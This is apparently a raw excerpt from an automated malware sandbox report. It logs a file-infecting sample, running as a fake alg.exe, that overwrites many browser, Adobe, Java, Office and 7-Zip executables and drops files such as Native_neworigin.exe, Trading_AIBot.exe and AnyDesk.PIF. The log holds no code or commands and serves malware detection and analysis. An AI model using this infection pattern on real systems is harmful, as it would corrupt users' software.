                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Infects executable files (exe, dll, sys, html)
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\AppVClient.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\alg.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exeJump to dropped file
                      Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
